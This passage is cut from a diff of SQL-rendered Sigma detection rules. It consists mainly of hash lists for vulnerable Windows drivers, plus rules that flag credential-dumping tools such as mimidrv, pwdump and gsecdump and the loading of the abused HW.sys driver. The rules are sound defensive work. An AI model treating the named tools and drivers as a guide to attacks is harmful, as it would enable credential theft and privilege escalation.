'9a1d66036b0868bbb1b2823209fedea61a301d5dd245f8e7d390bd31e52d663e', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', 'f51bdb0ad924178131c21e39a8ccd191e46b5512b0f2e1cc8486f63e84e5d960', 'b9b3878ddc5dfb237d38f8d25067267870afd67d12a330397a8853209c4d889c', '96bf3ee7c6673b69c6aa173bb44e21fa636b1c2c73f4356a7599c121284a51cc', '5a826b4fa10891cf63aae832fc645ce680a483b915c608ca26cedbb173b1b80a', '6948480954137987a0be626c24cf594390960242cd75f094cd6aaa5c2e7a54fa', '49ed27460730b62403c1d2e4930573121ab0c86c442854bc0a62415ca445a810', 'be54f7279e69fb7651f98e91d24069dbc7c4c67e65850e486622ccbdc44d9a57', '3d23bdbaf9905259d858df5bf991eb23d2dc9f4ecda7f9f77839691acef1b8c4', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'b48a309ee0960da3caaaaf1e794e8c409993aeb3a2b64809f36b97aac8a1e62a', '84bf1d0bcdf175cfe8aea2973e0373015793d43907410ae97e2071b2c4b8e2d4', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c9b49b52b493b53cd49c12c3fa9553e57c5394555b64e32d1208f5b96a5b8c6e', '79e2d37632c417138970b4feba91b7e10c2ea251c5efe3d1fc6fa0190f176b57', '3390919bb28d5c36cc348f9ef23be5fa49bfd81263eb7740826e4437cbe904cd', '58c071cfe72e9ee867bba85cbd0abe72eb223d27978d6f0650d0103553839b59', '607dc4c75ac7aef82ae0616a453866b3b358c6cf5c8f9d29e4d37f844306b97c', '358ac54be252673841a1d65bfc2fb6d549c1a4c877fa7f5e1bfa188f30375d69', 'd0bd1ae72aeb5f3eabf1531a635f990e5eaae7fdd560342f915f723766c80889', 'f85cca4badff17d1aa90752153ccec77a68ad282b69e3985fdc4743eaea85004', '6908ebf52eb19c6719a0b508d1e2128f198d10441551cbfb9f4031d382f5229f', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', 'de6bf572d39e2611773e7a01f0388f84fb25da6cba2f1f8b9b36ffba467de6fa', '950a4c0c772021cee26011a92194f0e58d61588f77f2873aa0599dff52a160c9', '36505921af5a09175395ebaea29c72b2a69a3a9204384a767a5be8a721f31b10', '6de84caa2ca18673e01b91af58220c60aecd5cccf269725ec3c7f226b2167492', 'ef86c4e5ee1dbc4f81cd864e8cd2f4a2a85ee4475b9a9ab698a4ae1cc71fbeb0', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '7cfa5e10dff8a99a5d544b011f676bc383991274c693e21e3af40cf6982adb8c', 'f596e64f4c5d7c37a00493728d8756b243cfdc11e3372d6d6dfeffc13c9ab960', '0aafa9f47acf69d46c9542985994ff5321f00842a28df2396d4a3076776a83cb', '131d5490ceb9a5b2324d8e927fea5becfc633015661de2f4c2f2375a3a3b64c6', '3124b0411b8077605db2a9b7909d8240e0d554496600e2706e531c93c931e1b5', '1b7fb154a7b7903a3c81f12f4b094f24a3c60a6a8cffca894c67c264ab7545fa', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497', '9c2f3e9811f7d0c7463eaa1ee6f39c23f902f3797b80891590b43bbe0fdf0e51', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c60fcff9c8e5243bbb22ec94618b9dcb02c59bb49b90c04d7d6ab3ebbd58dc3a', '4045ae77859b1dbf13972451972eaaf6f3c97bea423e9e78f1c2f14330cd47ca', 'a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '3f2fda9a7a9c57b7138687bbce49a2e156d6095dddabb3454ea09737e02c3fa5', 'f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', '5bc3994612624da168750455b363f2964e1861dba4f1c305df01b970ac02a7ae', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '0fd2df82341bf5ebb8a53682e60d08978100c01acb0bed7b6ce2876ada80f670', '8111085022bda87e5f6aa4c195e743cc6dd6a3a6d41add475d267dc6b105a69f', 'be03e9541f56ac6ed1e81407dcd7cc85c0ffc538c3c2c2c8a9c747edbcf13100', '47f08f7d30d824a8f4bb8a98916401a37c0fd8502db308aba91fe3112b892dcc', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '7f375639a0df7fe51e5518cf87c3f513c55bc117db47d28da8c615642eb18bfa', 'a56c2a2425eb3a4260cc7fc5c8d7bed7a3b4cd2af256185f24471c668853aee8', 'a3e507e713f11901017fc328186ae98e23de7cea5594687480229f77d45848d8', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '9529efb1837b1005e5e8f477773752078e0a46500c748bc30c9b5084d04082e6', '2bbe65cbec3bb069e92233924f7ee1f95ffa16173fceb932c34f68d862781250', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '39cfde7d401efce4f550e0a9461f5fc4d71fa07235e1336e4f0b4882bd76550e', '984a77e5424c6d099051441005f2938ae92b31b5ad8f6521c6b001932862add7', 'db2a9247177e8cdd50fe9433d066b86ffd2a84301aa6b2eb60f361cfff077004', '30706f110725199e338e9cc1c940d9a644d19a14f0eb8847712cba4cacda67ab', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', '9f4ce6ab5e8d44f355426d9a6ab79833709f39b300733b5b251a0766e895e0e5', 'd92eab70bcece4432258c9c9a914483a2267f6ab5ce2630048d3a99e8cb1b482', 'e4a7da2cf59a4a21fc42b611df1d59cae75051925a7ddf42bf216cc1a026eadb', '525d9b51a80ca0cd4c5889a96f857e73f3a80da1ffbae59851e0f51bdfb0b6cd', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '4cff6e53430b81ecc4fae453e59a0353bcfe73dd5780abfc35f299c16a97998e', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', 'f8236fc01d4efaa48f032e301be2ebba4036b2cd945982a29046eca03944d2ae', '575e58b62afab094c20c296604dc3b7dd2e1a50f5978d8ee24b7dca028e97316', '3d9e83b189fcf5c3541c62d1f54a0da0a4e5b62c3243d2989afc46644056c8e3', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', 'c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c', '7e0124fcc7c95fdc34408cf154cb41e654dade8b898c71ad587b2090b1da30d7', '61a1bdddd3c512e681818debb5bee94db701768fc25e674fcad46592a3259bd0', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '45abdbcd4c0916b7d9faaf1cd08543a3a5178871074628e0126a6eda890d26e0', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', '1e8b0c1966e566a523d652e00f7727d8b0663f1dfdce3b9a09b9adfaef48d8ee', 'e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e', '93d873cdf23d5edc622b74f9544cac7fe247d7a68e1e2a7bf2879fad97a3ae63', 'a9706e320179993dade519a83061477ace195daa1b788662825484813001f526', '61d6e40601fa368800980801a662a5b3b36e3c23296e8ae1c85726a56ef18cc8', '47eaebc920ccf99e09fc9924feb6b19b8a28589f52783327067c9b09754b5e84', 'fd8669794c67b396c12fc5f08e9c004fdf851a82faf302846878173e4fbecb03', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', '07b6d69bafcfd767f1b63a490a8843c3bb1f8e1bbea56176109b5743c8f7d357', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', '99f4994a0e5bd1bf6e3f637d3225c69ff4cd620557e23637533e7f18d7d6cba1', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', 'ece0a900ea089e730741499614c0917432246ceb5e11599ee3a1bb679e24fd2c', '8ef0ad86500094e8fa3d9e7d53163aa6feef67c09575c169873c494ed66f057f', '36b9e31240ab0341873c7092b63e2e0f2cab2962ebf9b25271c3a1216b7669eb', '6b830ea0db6546a044c9900d3f335e7820c2a80e147b0751641899d1a5aa8f74', '9c10e2ec4f9ef591415f9a784b93dc9c9cdafa7c69602c0dc860c5b62222e449', '5b9623da9ba8e5c80c49473f40ffe7ad315dcadffc3230afdc9d9226d60a715a', 'fafa1bb36f0ac34b762a10e9f327dcab2152a6d0b16a19697362d49a31e7f566', 'e61a54f6d3869b43c4eceac3016df73df67cce03878c5a6167166601c5d3f028', 'f88ebb633406a086d9cca6bc8b66a4ea940c5476529f9033a9e0463512a23a57', '2aa1b08f47fbb1e2bd2e4a492f5d616968e703e1359a921f62b38b8e4662f0c4', '06508aacb4ed0a1398a2b0da5fa2dbf7da435b56da76fd83c759a50a51c75caf', 'cc383ad11e9d06047a1558ed343f389492da3ac2b84b71462aee502a2fa616c8', '845f1e228de249fc1ddf8dc28c39d03e8ad328a6277b6502d3932e83b879a65a', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', '64f9e664bc6d4b8f5f68616dd50ae819c3e60452efd5e589d6604b9356841b57', '2a652de6b680d5ad92376ad323021850dab2c653abf06edf26120f7714b8e08a', '85866e8c25d82c1ec91d7a8076c7d073cccf421cf57d9c83d80d63943a4edd94', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', 'bb50818a07b0eb1bd317467139b7eb4bad6cd89053fecdabfeae111689825955', '9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87', 'b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '1c8dfa14888bb58848b4792fb1d8a921976a9463be8334cff45cc96f1276049a', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', '5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a', 'f40435488389b4fb3b945ca21a8325a51e1b5f80f045ab019748d0ec66056a8b', '405472a8f9400a54bb29d03b436ccd58cfd6442fe686f6d2ed4f63f002854659', '3a95cc82173032b82a0ffc7d2e438df64c13bc16b4574214c9fe3be37250925e', '42579a759f3f95f20a2c51d5ac2047a2662a2675b3fb9f46c1ed7f23393a0f00', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '159e7c5a12157af92e0d14a0d3ea116f91c09e21a9831486e6dc592c93c10980', '5c04c274a708c9a7d993e33be3ea9e6119dc29527a767410dbaf93996f87369a', 'fcdfe570e6dc6e768ef75138033d9961f78045adca53beb6fdb520f6417e0df1', 'cb57f3a7fe9e1f8e63332c563b0a319b26c944be839eabc03e9a3277756ba612', '4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6', '80cbba9f404df3e642f22c476664d63d7c229d45d34f5cd0e19c65eb41becec3', '29e0062a017a93b2f2f5207a608a96df4d554c5de976bd0276c2590a03bd3e94', 'db90e554ad249c2bd888282ecf7d8da4d1538dd364129a3327b54f8242dd5653', '8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e', '101402d4f5d1ae413ded499c78a5fcbbc7e3bae9b000d64c1dd64e3c48c37558', '6ed35f310c96920a271c59a097b382da07856e40179c2a4239f8daa04eef38e7', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '37dde6bd8a7a36111c3ac57e0ac20bbb93ce3374d0852bcacc9a2c8c8c30079e', '5d530e111400785d183057113d70623e17af32931668ab7c7fc826f0fd4f91a3', 'd7bc7306cb489fe4c285bbeddc6d1a09e814ef55cf30bd5b8daf87a52396f102', '7049f3c939efe76a5556c2a2c04386db51daf61d56b679f4868bb0983c996ebb', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '3243aab18e273a9b9c4280a57aecef278e10bfff19abb260d7a7820e41739099', '0040153302b88bee27eb4f1eca6855039e1a057370f5e8c615724fa5215bada3', 'f0605dda1def240dc7e14efa73927d6c6d89988c01ea8647b671667b2b167008', 'b1334a71cc73b3d0c54f62d8011bec330dfc355a239bf94a121f6e4c86a30a2e', '74a846c61adc53692d3040aff4c1916f32987ad72b07fe226e9e7dbeff1036c4', '7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6', 'c1c4310e5d467d24e864177bdbfc57cb5d29aac697481bfa9c11ddbeebfd4cc8', '22418016e980e0a4a2d01ca210a17059916a4208352c1018b0079ccb19aaf86a', '76b86543ce05540048f954fed37bdda66360c4a3ddb8328213d5aef7a960c184', 'dd4a1253d47de14ef83f1bc8b40816a86ccf90d1e624c5adf9203ae9d51d4097', '025e7be9fcefd6a83f4471bba0c11f1c11bd5047047d26626da24ee9a419cdc4', '50d5eaa168c077ce5b7f15b3f2c43bd2b86b07b1e926c1b332f8cb13bd2e0793', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c', 'd8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2', '49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', 'ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2', '4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9', '84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4', '7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376', 'cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1', '8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce', '36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a', '7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca', '591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52', '04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162', '4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', 'e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293', '49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530', 'd8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530', '7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be', 'e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1', '5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be', 'cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812', 'ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165', '475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8', '72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1', 'cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b', 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe', '5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', 'f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', '2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e', '54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57', 'e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217', 'cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b', '6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1', '708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965', '362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc', '08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6', '2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d', 'c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c', '4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', '76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303', '3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b'))" ], - "filename": "win_system_rdp_potential_cve_2019_0708.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", "status": "experimental", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE 